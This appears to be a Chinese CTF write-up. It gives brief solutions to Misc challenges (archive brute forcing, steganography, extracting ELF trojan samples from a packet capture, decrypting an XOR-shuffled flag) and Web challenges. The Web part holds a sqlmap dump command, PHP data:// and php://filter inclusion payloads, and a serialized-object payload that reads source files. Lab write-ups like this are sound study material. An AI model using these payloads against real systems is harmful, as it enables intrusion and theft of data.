Misc

zip

• 根据压缩包注释，猜测字符集为01的密码，长度1-9，爆破得到flag

SimpleDocument

• foremost分离文件，得到一个pdf，直接Ctrl+A，Ctrl+C

BeautifulImage

• LSB隐写，base64隐写

hacker_traffic

• 直接对分离文件，得到带有注释的压缩包
  • password is (md5(virus_file) + lhost_ip)
• 存在大量ELF木马文件

• 写个脚本全部提取

a = open("hacker_traffic.pcapng", 'rb').read()
a = a.hex()
b = [16055, 55019, 92151, 129283, 166415, 203547, 240679, 277811, 314943, 352075, 389207, 426339, 463471, 500603, 537735, 574867, 611999, 649131, 686263, 723395, 760527, 797659, 839291, 876423, 913555, 950687, 987819, 1024951, 1062083, 1099215, 1136347, 1173479, 1210611, 1247743, 1284875, 1322007, 1359139, 1396271, 1433403, 1470535, 1507667, 1544799, 1581931, 1619063, 1656195, 1693327, 1730459, 1767591, 1804723, 1841855, 1878987, 1916119, 1953251, 1990383, 2027515, 2064647, 2101779, 2138911, 2176043, 2213175, 2250307, 2287567, 2324699, 2361959, 2399091, 2436223, 2473355, 2510487, 2547619, 2584751, 2621883, 2659015, 2696147, 2733279, 2770411, 2807543, 2844675, 2881807, 2918939, 2956071, 2993203, 3030335, 3067467, 3104599, 3141731, 3178863, 3215995, 3253127, 3290259, 3327391, 3364523, 3401655, 3438787, 3475919, 3513051, 3550183, 3587315, 3624447, 3661579, 3698711]

for i in b:
    open(f"test/{i}", "wb").write(bytes.fromhex(a[i * 2:i * 2 +33792]))

• 发现一个ip地址，运行一下抓个包，判断此地址就是lhost

• 接下来算MD5，发现值不对，可能是结尾有多的东西，写个脚本生成个字典

from hashlib import md5


a = open('2287567', 'rb').read()
# for i in range(len(a))
file = open('test.txt', 'a')
for i in range(len(a)):
    file.write(md5(a[:-i]).hexdigest() + '192.168.3.201\n')

• 解压得到加密脚本

from flag import secret
key = "x.x.x.x"


def encrypt_flag(flag, key):
    random.seed(key)
    table = list(range(0, 38))
    random.shuffle(table)
    flag = [flag[i] for i in table]
    ascii_flag = [ord(c) for c in flag]
    random.seed(key)
    xor_key = random.randint(0, 255)
    encrypted_flag = [c ^ xor_key for c in ascii_flag]
    return base64.b64encode(bytes(encrypted_flag)).decode("ascii")
print(encrypt_flag(flag, key))
# VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=

• 写个解密脚本

import base64

def decrypt(t):
    flag = base64.b64decode(t).decode("ascii")
    xor_key = 96
    ascii_flag = [ord(c) for c in flag]
    encrypted_flag = ''.join([chr(c ^ xor_key) for c in ascii_flag])
    table = [25, 28, 7, 24, 5, 0, 33, 21, 1, 31, 29, 2, 18, 27, 19, 13, 22, 9, 30, 10, 3, 11, 35, 15, 20, 16, 4, 23, 37, 36, 17, 32, 6, 34, 8, 26, 14, 12]
    a = [i for i in range(38)]
    for i in range(38):
        a[table[i]] = encrypted_flag[i]
    print(''.join(a))


decrypt("VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=".encode())

Web

Query

• sqlmap一把梭

python sqlmap.py -u http://62be1f5b518e59a9.node.nsctf.cn/login.php --data="username=admin&password=admin" -D ctf -T f111 --dump --batch

codecheck

<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->

• payload

?a=data://text/plain;base64,ZmxhZw==&b=php://filter/read=convert.base64-encode/resource=index.php&c=a&d=a

Deserialization

• 读取route.php
• read=php://filter/read=convert.base64-encode/resource=route.php&input=1

• read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1

• read=h1nt.php&input=O:4:”test”:1:{s:8:”position”;s:57:”php://filter/read=convert.base64-encode/resource=f14g.php”;}